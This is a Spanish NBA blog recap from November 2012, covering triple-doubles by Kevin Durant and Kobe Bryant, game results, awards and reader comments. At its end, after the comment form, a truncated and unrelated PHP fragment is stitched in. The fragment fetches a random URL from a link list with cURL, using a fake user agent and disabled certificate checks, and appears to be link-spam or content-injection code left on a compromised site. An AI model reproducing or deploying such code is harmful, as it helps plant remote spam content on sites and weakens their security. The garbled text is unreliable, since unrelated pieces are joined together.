La Crónica: Noche de triples dobles

19 de November de 2012 por TheDeerHunter

Alguno de nuestros insomnes lo anunciaba (casi) en directo en twitter hace escasas 3 horas: “Noche del primer triple doble en la carrera de Kevin Durant, Kobe consigue su 18º.”

Así, la siempre amable defensa de los Warriors obraba el milagro de dejarnos ver a Durant repartir 10 asistencias, además de sus más habituales 25 puntos y 13 rebotes. Una escuadra equipa muy dada al “yo me lo guiso”, que terminó con 31 asistencias y un impresionante 65% en triples (13 de 20). Sorprende que no fuera un palizón humillante visto lo cómodos que se encontraron Westbrook, Martin y el propio Durantula (109-119).

En los Angeles, la inspiración “showtime” de D’Antoni mantiene el efecto, a pesar de que ni el técnico ni Nash han ocupado su sitio. Ayer Kobe jugó a ser Magic Johnson con una actuación alucinante ante Houston. Cuesta encontrar ejemplos en los que el quinteto amarillo al completo se vaya a las dobles figuras, pero aún cuesta más que la suplencia aporte tanto. Nuevo hito de Pau, por cierto, que también anunciábamos en directo. Los Lakers vuelven al 50% en el balance (108-119). 

Tras las 20 asistencias de Rondo el día anterior con Calderón de testigo directo, éste se destapaba anoche con 18 y los Raptors firmaban su tercera victoria ante Orlando (86-97). Rondo y sus Celtics, sin embargo, protagonizaban la sorpresa negativa de la noche al caer derrotados de 20 en Detroit, en el mejor partido de éstos en lo que va de curso para abrir su casillero de victorias locales (83-103). Destacado Monroe, pero 5 tíos más en dobles figuras.

En lo que resta de jornada, los Knicks volvieron a la senda de la victoria ante unos Pacers bastante horribles (76-88); los Sixers demostraron que no les afecta la lesión “bolera” de Bynum, pues siempre pueden desplegar al inconmensurable Kwane (0-0-0-1 tapón) y así doblegar a los Cavs en un partido muy flojo de Irving (79-86); los Kings le regalaron a los Nets el choque a base de pérdidas y tiros libres fallados (99-90) y los Blazers alargaron su racha victoriosa contra los Bulls (94-102).

PREMIOS

MVP: Pareja de ases. Kobe Bryant se marcó 22 puntos, 11 rebotes y 11 asistencias. Kevin Durant vio y subió la apuesta a 25 puntos, 13 rebotes y 10 asistencias. Imposible elegir entre papá y mamá.

Rookie: 16 puntos para Damian Lillard; 8 puntos, 4 rebotes, 3 asistencias, 2 robos y 1 tapón para Terrence Jones, 12 puntos para Harrison Barnes; 9 y 5 rebotes para Draymond Green en su primer buen partido de la temporada; 14 para Kyle Singler… Pero mejor del día fue Jared Sullinger con 16 puntos y 5 rebotes.

Sorpresa: ¿Eres tú, Blatche? 22 puntos en 19 minutos se marcó el ex jugador de los Wizards. Este nuevo papel que asume en los Nets le está sentando bien.

Decepción: Hoy tenemos para repartir. Gerald Wallace no hacía falta que volviera si iba a anotar sólo 4 puntos y coger 3 rebotes; Roy Hibbert sigue a su nivel, anoche fueron 6 puntos y 8 rebotes; Klay Thompson fue la oveja negra de un equipo que anotó más del 50% de sus tiros; Carlos Boozer no pasó tampoco de los 4 puntos; mal día para la pareja Dion Waiters y Kyrie Irving, entre ambos anotaron solo 6 tiros de 26 intentos, y mención especial para los Celtics, que solo fueron capaces de repartir 12 asistencias en total y cayeron con estrépito ante los Pistons.

Esfuerzo en vano: Ni los 16 puntos, 15 rebotes y 8 asistencias de Joakim Noah ni los 29 puntos y 7 rebotes de Demarcus Cousins sirvieron para que sus respectivos equipos se llevaran la victoria.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

22 comentarios a esta entrada

  1. GreenPride dice:
    #1

    De anoche destacan varias cosas. Primera los Lakers se suben a la moto de D’Antoni y como no podía ser de otra manera empiezan a ganar partidos. Si esa mejoría les valdrá ante grandes equipos está por ver pero ver a Kobe trabajando más allá de la anotación puede ser un comienzo. Se divertirán en LA este año aunque queda por ver si a nivel competitivo les valdrá para el anillo.
    Triple-doble también para Durantula. Los Warriors son un equipo con buenos mimbres pero con esa defensa de chiste aquí no se va a ningún lado. Bien de nuevo Kevin Martin que está jugando a un gran nivel en los Thunder.
    Trastazo sin perdón para los Celtics. El equipo sigue con muchos altibajos y con graves problemas interiores. Ayer Monroe les hizo un traje y el rebote es un caos y una rémora muy grave para el equipo. Aún así hay que dar tiempo a sus veteranos para que cojan la forma y se acoplen piezas y me temo que vamos a ver estos sube y bajas durante buena parte de la temporada en los de Boston.
    Suma y sigue para Brooklyn que está cumpliendo con las expectativas y para New York que ganó a unos irreconocibles Pacers (¿Que pasa con Hibbert? Cazo Mix total este tío), la gran decepción de lo que va de campaña. Philly sigue manteniendo un nivel medio a la espera de que cabeza-loca Bynum llegue a debutar algún día

      Citar

  2. txusma dice:
    #2

    Klay Thompson tenía que ser el nuevo Monta Ellis, no? De momento decepcionante. A ver si se asienta y gana confianza.

      Citar

  3. Chipi dice:
    #3

    Veo que el 1/10 de JoJo ya ni siquiera lo calificamos de sorpresa. Vaya inicio de curso que lleva el colega. Le voy a empezar a llamar JobJob, como la iguana de Tía Selma, hasta que espabile y se le quite la caraja.

      Citar

  4. melo15 dice:
    #4

    txusma:
    Klay Thompson tenía que ser el nuevo Monta Ellis, no? De momento decepcionante. A ver si se asienta y gana confianza.

    Bueno el se ponia como meta Ginobili, que me parece un chiste porque a este tio no la intensidad y la inteligencia no se le ven. Esta seleccionando mal y esta teniendo unos porcentajes malisimos, creo que una solucion seria sacarlo desde el banco, porque Curry y el son demasiado incompatibles.

      Citar

  5. melo15 dice:
    #5

    Hibbert y Ilyasova son para mi las grandes decepciones de este curso con Tyreke Evans, este ultimo no progresa nada y los dos de antes estan rindiendo fatal, no si sera por el nuevo contrato pero por tipos como estos se arruinan franquicias. Orlando?

      Citar

  6. melo15 dice:
    #6

    Bien los Raptors, pensaba que iban a tener un mal curso pero no lo estan haciendo mal, estan siendo combativos y peleando mucho hasta el final, creo que el problema es mas por el calendario, que esta siendo bastante duro.

      Citar

  7. TheDeerHunter dice:
    #7

    Quién ha visto a Melo15 comentando y quién le ve

      Citar

  8. Vader dice:
    #8

    TheDeerHunter:
    Quién ha visto a Melo15 comentando y quién le ve

    Pues si O.o

      Citar

  9. melo15 dice:
    #9

    Son los Knicks que me motivan!

      Citar

  10. MagicJohnson32 dice:
    #10

    Oye, sé que hay mucho Rondista aquí, así que lo suelto: ¿no os parece hasta ridícula su obsesión por hacer 10 asistencias cada partido?

      Citar

  11. simon dice:
    #11

    A mi tyreke e Ilyasova no me sorpenden para nada, uno porque me parece q su tope ya lo alcanzo e.involuciona e Ilyasova pq se veia de lejos q era del club del cazo. Hibbert si q esperaba algo mas de el sobretodo son granger pero menuda decepcion, no obstants no creo q este en la elite de la liga dentro de los.pivots ni de cerca.

    Sobro lo de Rondo y las 10 asistencias pues si, ayer parece ser q dio bastante pena de la forma en las q la consiguio pero es lo q dijo Doc ya q el partido estaba decantado al menos intentar manter la marca q es algo bonito y q se recordara dentro de muchos años. Por su puesto q si el partido hubiera estado en el aire Ni Rondo ni los Celtics hubieran entrado en esa dinamica de lograrlo a toda costa.

      Citar

  12. simon dice:
    #12

    Perdonar por las faltas y errores en pa ortografia pero estoy con el movil y cuesta escribir correctamente.

      Citar

  13. Esteban dice:
    #13

    Jaja comparto q lo de jojo a esta altura no califica de decepcion, esta siendo un lastre total
    Siempre dije q seria un buen fichaje si quien lo tomara no tendria problemas en pagar impuesto de lujo y tirar sus millones, bueno, no lo esta siendo, es quiza el peor de todos los nets, hoy esta jugando mejor jerry

    Sobre wallace, lo veo perdido en la ofensiva, q de por si es muy mala, el ataque de los nets se base todo todo en deron y tiene algo de aire cuando entran watson y brooks, sino dependen de algun punto de lopz o hasta blatche

    Lo que si estan haciendo es defender bien

    Una consulta a los españoles, por q teletovic no fue elegido en el draft? Era malo de joven y bue mejorando? Viendo cada jugador elegido, llama mucho la atencion

      Citar

  14. melo15 dice:
    #14

    Simon y porque habian de ser del cazo mix? Esque todos los jugadores que rinden bien antes de acabar su contrato se han de dejar llevar al año siguiente? Mira Turkoglu XD.
    Bueno fuera bromas, no lo entiendo.

      Citar

  15. Esteban dice:
    #15

    lo de hibbert no es un cazo mix, el año pasado tampoco fue una bestia, esta algo por debajo de lo que se esperaba, las defensas se han fijado mas en el, sumado a q la falta de granger a destuido la ofensiva pacers, no tiene por el deber de salvarse solo

    su contrato es malo si, pero si vemos, es igual al que tienn todos los centros titulares de la nba medianamente decente,

    si los pacers funcionan mejor e ataque y vuelve granger, hibbert subira sus prestaciones y sera el del año pasado

    ahora, si alguien esperaba que fuera una shaq o howard de la vida, culpa de quien espera peras del olmo

      Citar

  16. simon dice:
    #16

    Pq quien haya seguido la carrera de Ilyasova vera q solo se ha movido siempre por el dinero y baj la ley del minimo esfuerzo. El año pasado si te fijas empezo regular nada mas y cada vez fue subiendo en intensidsd y en numeros.. Su primer año en la liga fue bueno ( sino se esforzaba le iban a pegar una patada en el culo) al siguiente medio bueno, el tercero fue peor y el 4 como tenia q ganarse el contrato dio su mejor nivel. Vamos q se veia de lejos.

      Citar

  17. Pop dice:
    #17

    MagicJohnson32:
    Oye, sé que hay mucho Rondista aquí, así que lo suelto: ¿no os parece hasta ridícula su obsesión por hacer 10 asistencias cada partido?

    Yo creo que a veces sí se obsesiona un poco con los números. Es frecuente verle sin llevar una gran dirección de juego pero saliendo con 15 asistencias.

    Por otra parte el modo de contar asistencias en la NBA a veces roza el absurdo. He visto el vídeo de las 20 asistencias y algunas..puff; como las que le pica el balón a Garnett y éste pivota, amaga, finta…y en definitiva se hace la canasta básicamente él.

      Citar

  18. MagicJohnson32 dice:
    #18

    Creo que a Tyreke le iría bien un cambio de aires, a Ilyasova un cambio de entrenador y a Hibbert un cambio de sangre.

    Si alguien necesita que argumente, que lo diga y ya haré el esfuerzo 😀

      Citar

  19. MagicJohnson32 dice:
    #19

    Pop: Yo creo que a veces sí se obsesiona un poco con los números. Es frecuente verle sin llevar una gran dirección de juego pero saliendo con 15 asistencias.

    Por otra parte el modo de contar asistencias en la NBA a veces roza el absurdo. He visto el vídeo de las 20 asistencias y algunas..puff; como las que le pica el balón a Garnett y éste pivota, amaga, finta…y en definitiva se hace la canasta básicamente él.

    Sí, esa asistencia es absurda, pero así funciona el tema en la NBA, que depende de que al tipo que apunta la estadística le caiga bien el jugador o no, o tenga a su jugador en su equipo de la fantasy o en el del rival, jeje (bueno, y en la ACB igual).

      Citar

  20. Esteban dice:
    #20

    wow como molan los bobcats, 5-4, que les parece? mas vailoso si vemos que en su conferencia los wizards van 0-8-0, detroit 2-9, cavs 2-8 y raptors 3-7

    gran trabajo de dunlap, este tio tenia laures o q?
    walker en un temporaron, para mi insospechado luego de su año rookie, y sessions demostrando que puede ser candidado al mejor sexto hombre
    mulles al mas mejorado?
    haywood hasta parece un pivote decente

    cuando regrese henderson y se acople warrick, pueden pelear por una octava plaza, aunque los sigo viendo lejos

    jordan se rie por lo bajo…

      Citar

  21. Esteban dice:
    #21

    si pensamos en que en el este las cosas terminaran asi:

    miami
    knicks
    nets
    celtics
    76ers
    bucks

    hoy los dos ultimos puestos estan entre bulls, hawks, pacers y bobcats

      Citar

  22. rumbero dice:
    #22

    MagicJohnson32:
    Oye, sé que hay mucho Rondista aquí, así que lo suelto: ¿no os parece hasta ridícula su obsesión por hacer 10 asistencias cada partido?

    ¿Aquí lo que pasa que ves más cerca que pueda caer tu record no? 😀
    Yo soy muy rondista pero lo del partido contra los Pistons fue esperpéntico. Y ha tenido algun otro menos descarado pero donde también se le vió buscando más de la cuenta las 2 asistencias que le faltaban.
    Pero vaya tampoco creo que sea algo crónico hasta la fecha, el chaval es muy bueno y se suele ponerse con sus 6-8 asistencias relativamente fácil y sin mucha obsesión…luego a ver quien le dice que se pare.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>